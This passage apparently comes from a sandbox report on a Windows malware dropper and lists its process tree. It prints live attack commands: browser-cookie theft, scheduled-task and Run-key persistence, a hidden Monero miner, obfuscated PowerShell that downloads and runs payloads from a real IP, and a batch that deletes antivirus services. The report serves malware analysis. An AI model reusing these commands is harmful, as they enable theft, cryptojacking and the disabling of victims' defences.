        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1544
        7⤵
        Program crash
        
        PID:6444
      - C:\Users\Admin\Documents\8WmN4PFYSaGwkvgq1j3rBgnt.exe
        
        "C:\Users\Admin\Documents\8WmN4PFYSaGwkvgq1j3rBgnt.exe"
        6⤵
        
        PID:2076
        
        C:\Users\Admin\Documents\8WmN4PFYSaGwkvgq1j3rBgnt.exe
        
        "C:\Users\Admin\Documents\8WmN4PFYSaGwkvgq1j3rBgnt.exe"
        7⤵
        
        PID:5812
      - C:\Users\Admin\Documents\XjbzFuKtFijO9hBtjL9Vax8g.exe
        
        "C:\Users\Admin\Documents\XjbzFuKtFijO9hBtjL9Vax8g.exe"
        6⤵
        
        PID:5392
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        7⤵
        
        PID:5984
        
        C:\Program Files (x86)\Company\NewProduct\customer3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
        7⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6244
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
        8⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        8⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        8⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        8⤵
        
        PID:4500
        
        C:\Program Files (x86)\Company\NewProduct\jooyu.exe
        
        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
        7⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6048
      - C:\Users\Admin\Documents\oUsTidh7k4drKKtjjcZHyZ1S.exe
        
        "C:\Users\Admin\Documents\oUsTidh7k4drKKtjjcZHyZ1S.exe"
        6⤵
        
        PID:5532
        
        C:\Users\Admin\AppData\Roaming\4888560.exe
        
        "C:\Users\Admin\AppData\Roaming\4888560.exe"
        7⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Roaming\5307270.exe
        
        "C:\Users\Admin\AppData\Roaming\5307270.exe"
        7⤵
        
        PID:6972
        
        C:\Users\Admin\AppData\Roaming\4862144.exe
        
        "C:\Users\Admin\AppData\Roaming\4862144.exe"
        7⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Roaming\5028339.exe
        
        "C:\Users\Admin\AppData\Roaming\5028339.exe"
        7⤵
        
        PID:7060
      - C:\Users\Admin\Documents\8L9KJ4SmOWnBIT_QqueXpAVc.exe
        
        "C:\Users\Admin\Documents\8L9KJ4SmOWnBIT_QqueXpAVc.exe"
        6⤵
        
        PID:5664
        
        C:\Users\Admin\Documents\8L9KJ4SmOWnBIT_QqueXpAVc.exe
        
        "C:\Users\Admin\Documents\8L9KJ4SmOWnBIT_QqueXpAVc.exe"
        7⤵
        
        PID:5604
      - C:\Users\Admin\Documents\Ywi4szUu25c2kO1WhCz9yN3S.exe
        
        "C:\Users\Admin\Documents\Ywi4szUu25c2kO1WhCz9yN3S.exe"
        6⤵
        
        PID:5756
      - C:\Users\Admin\Documents\b5kojuAf9z1euGW43I09kTgX.exe
        
        "C:\Users\Admin\Documents\b5kojuAf9z1euGW43I09kTgX.exe"
        6⤵
        
        PID:5776
      - C:\Users\Admin\Documents\N_coQfcdHOdJjtfYQG51sJ0f.exe
        
        "C:\Users\Admin\Documents\N_coQfcdHOdJjtfYQG51sJ0f.exe"
        6⤵
        
        PID:6088
      - C:\Users\Admin\Documents\Zq9mdiUrt59wXdx43BOIIUT2.exe
        
        "C:\Users\Admin\Documents\Zq9mdiUrt59wXdx43BOIIUT2.exe"
        6⤵
        
        PID:5244
        
        C:\Users\Admin\Documents\Zq9mdiUrt59wXdx43BOIIUT2.exe
        
        C:\Users\Admin\Documents\Zq9mdiUrt59wXdx43BOIIUT2.exe
        7⤵
        
        PID:4740
      - C:\Users\Admin\Documents\OONIEMlHESpVJ3sw0qfanWB4.exe
        
        "C:\Users\Admin\Documents\OONIEMlHESpVJ3sw0qfanWB4.exe"
        6⤵
        
        PID:5400
        
        C:\Users\Admin\Documents\OONIEMlHESpVJ3sw0qfanWB4.exe
        
        C:\Users\Admin\Documents\OONIEMlHESpVJ3sw0qfanWB4.exe
        7⤵
        
        PID:4844
      - C:\Users\Admin\Documents\zKURfxjPS4BR79sPCwyR4Xix.exe
        
        "C:\Users\Admin\Documents\zKURfxjPS4BR79sPCwyR4Xix.exe"
        6⤵
        
        PID:4028
        
        C:\Users\Admin\Documents\zKURfxjPS4BR79sPCwyR4Xix.exe
        
        "{path}"
        7⤵
        
        PID:7980
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:8008
      - C:\Users\Admin\Documents\DZJ0O71zywaqbGmJvbKTejMr.exe
        
        "C:\Users\Admin\Documents\DZJ0O71zywaqbGmJvbKTejMr.exe"
        6⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 780
        7⤵
        Program crash
        
        PID:6032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 816
        7⤵
        Program crash
        
        PID:3780
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1136
        7⤵
        Program crash
        
        PID:1568
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1156
        7⤵
        Program crash
        
        PID:6460
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1196
        7⤵
        Program crash
        
        PID:6804
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1200
        7⤵
        Program crash
        
        PID:7084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1080
        7⤵
        Program crash
        
        PID:6424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1144
        7⤵
        Program crash
        
        PID:6732
      - C:\Users\Admin\Documents\NbDpYCh2GWg0aCJUY6k_7Rc5.exe
        
        "C:\Users\Admin\Documents\NbDpYCh2GWg0aCJUY6k_7Rc5.exe"
        6⤵
        
        PID:5596
      - C:\Users\Admin\Documents\xHMa2YM4thAr0CNfB2AjwLko.exe
        
        "C:\Users\Admin\Documents\xHMa2YM4thAr0CNfB2AjwLko.exe"
        6⤵
        
        PID:4376
        
        C:\Users\Admin\Documents\xHMa2YM4thAr0CNfB2AjwLko.exe
        
        C:\Users\Admin\Documents\xHMa2YM4thAr0CNfB2AjwLko.exe
        7⤵
        
        PID:6780
      - C:\Users\Admin\Documents\W4VyEufKwd_BQNP5DmNWBz_Q.exe
        
        "C:\Users\Admin\Documents\W4VyEufKwd_BQNP5DmNWBz_Q.exe"
        6⤵
        
        PID:5252
      - C:\Users\Admin\Documents\3XXzbwgWkqtrRl6zXDj2ihhs.exe
        
        "C:\Users\Admin\Documents\3XXzbwgWkqtrRl6zXDj2ihhs.exe"
        6⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\is-F89LL.tmp\3XXzbwgWkqtrRl6zXDj2ihhs.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F89LL.tmp\3XXzbwgWkqtrRl6zXDj2ihhs.tmp" /SL5="$3030E,138429,56832,C:\Users\Admin\Documents\3XXzbwgWkqtrRl6zXDj2ihhs.exe"
        7⤵
        
        PID:2632
      - C:\Users\Admin\Documents\r9MADWq5BguTsdDdVviCsthK.exe
        
        "C:\Users\Admin\Documents\r9MADWq5BguTsdDdVviCsthK.exe"
        6⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Roaming\4644371.exe
        
        "C:\Users\Admin\AppData\Roaming\4644371.exe"
        7⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Roaming\5569365.exe
        
        "C:\Users\Admin\AppData\Roaming\5569365.exe"
        7⤵
        
        PID:7096
      - C:\Users\Admin\Documents\I39IpzBYgf2YoPCySl_8RYAN.exe
        
        "C:\Users\Admin\Documents\I39IpzBYgf2YoPCySl_8RYAN.exe"
        6⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Roaming\1521415.exe
        
        "C:\Users\Admin\AppData\Roaming\1521415.exe"
        7⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Roaming\3641382.exe
        
        "C:\Users\Admin\AppData\Roaming\3641382.exe"
        7⤵
        
        PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c a6d6262485.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3324
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\a6d6262485.exe
        
        a6d6262485.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c c65040c72c7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3292
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\c65040c72c7.exe
        
        c65040c72c7.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        
        PID:1380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 757755d929c68.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1172
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\757755d929c68.exe
        
        757755d929c68.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2500
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4708
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:6140
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:2380
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:5216
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:7484
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:7816
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:7588
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4856
        
        C:\Users\Admin\AppData\Roaming\6694228.exe
        
        "C:\Users\Admin\AppData\Roaming\6694228.exe"
        8⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Roaming\1119542.exe
        
        "C:\Users\Admin\AppData\Roaming\1119542.exe"
        8⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Roaming\3797372.exe
        
        "C:\Users\Admin\AppData\Roaming\3797372.exe"
        8⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Roaming\2096115.exe
        
        "C:\Users\Admin\AppData\Roaming\2096115.exe"
        8⤵
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        
        PID:8060
        
        C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        7⤵
        Executes dropped EXE
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        Executes dropped EXE
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe" -a
        8⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7.exe"
        7⤵
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\tmp3BB2_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp3BB2_tmp.exe"
        8⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\dllhost.exe
        
        "C:\Windows\System32\dllhost.exe"
        9⤵
        
        PID:6528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cmd < Sia.tiff
        9⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        10⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^pkGGAfikiUHgkUsEdYECSyCYSsHNpFrexxWaHUdYNNqBjTuNBNmlmGvtIHOoIxwBQETRXZXvIGOytwLYlTkcySDOYSJZuidzLnLI$" Sai.tiff
        11⤵
        
        PID:5072
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Orlo.exe.com
        
        Orlo.exe.com S
        11⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Orlo.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Orlo.exe.com S
        12⤵
        
        PID:6828
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 30
        11⤵
        Runs ping.exe
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        7⤵
        Executes dropped EXE
        
        PID:4136
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 668
        8⤵
        Program crash
        
        PID:5856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 696
        8⤵
        Program crash
        
        PID:3424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 752
        8⤵
        Program crash
        
        PID:5780
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 716
        8⤵
        Program crash
        
        PID:5556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 892
        8⤵
        Program crash
        
        PID:2476
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1008
        8⤵
        Program crash
        
        PID:5748
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1108
        8⤵
        Program crash
        
        PID:6008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1280
        8⤵
        Program crash
        
        PID:4560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1584
        8⤵
        Program crash
        
        PID:6708
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1620
        8⤵
        Program crash
        
        PID:5532
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1324
        8⤵
        Program crash
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8.exe"
        7⤵
        
        PID:4164
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4164 -s 1532
        8⤵
        Program crash
        
        PID:7128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 29dc9096b9.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1304
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\29dc9096b9.exe
        
        29dc9096b9.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3148
      - C:\Users\Admin\AppData\Roaming\1642518.exe
        
        "C:\Users\Admin\AppData\Roaming\1642518.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4356
      - C:\Users\Admin\AppData\Roaming\6326952.exe
        
        "C:\Users\Admin\AppData\Roaming\6326952.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4416
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:4976
      - C:\Users\Admin\AppData\Roaming\6493146.exe
        
        "C:\Users\Admin\AppData\Roaming\6493146.exe"
        6⤵
        Executes dropped EXE
        
        PID:4480
      - C:\Users\Admin\AppData\Roaming\6911857.exe
        
        "C:\Users\Admin\AppData\Roaming\6911857.exe"
        6⤵
        Executes dropped EXE
        
        PID:4532
      - C:\Users\Admin\AppData\Roaming\5323963.exe
        
        "C:\Users\Admin\AppData\Roaming\5323963.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ed10a8b2b3d6.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:740
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\ed10a8b2b3d6.exe
        
        ed10a8b2b3d6.exe
        5⤵
        Executes dropped EXE
        
        PID:2480
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im ed10a8b2b3d6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\ed10a8b2b3d6.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im ed10a8b2b3d6.exe /f
        7⤵
        Kills process with taskkill
        
        PID:6504
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:7388
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 6f0ef9103.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2120
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\6f0ef9103.exe
        
        6f0ef9103.exe
        5⤵
        Executes dropped EXE
        
        PID:3948

C:\Users\Admin\AppData\Local\Temp\is-OBO9F.tmp\a6d6262485.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OBO9F.tmp\a6d6262485.tmp" /SL5="$D01E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\a6d6262485.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2624

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:5900

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:808

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6680
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6532

C:\Users\Admin\AppData\Local\Temp\D487.exe
C:\Users\Admin\AppData\Local\Temp\D487.exe
1⤵
PID:6864
- C:\ProgramData\Runtimebroker.exe
  "C:\ProgramData\Runtimebroker.exe"
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
    3⤵
    PID:7496
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      PID:7900
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete 